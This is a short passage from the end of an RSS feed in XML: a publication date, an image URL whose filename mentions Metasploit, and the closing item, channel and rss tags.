      <pubDate>Fri, 05 Dec 2025 20:58:04 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0475760a2990dfd7/6849ab41a770d7563190a3ea/metasploit-fence.png" medium="image" />
    </item>
  </channel>
</rss>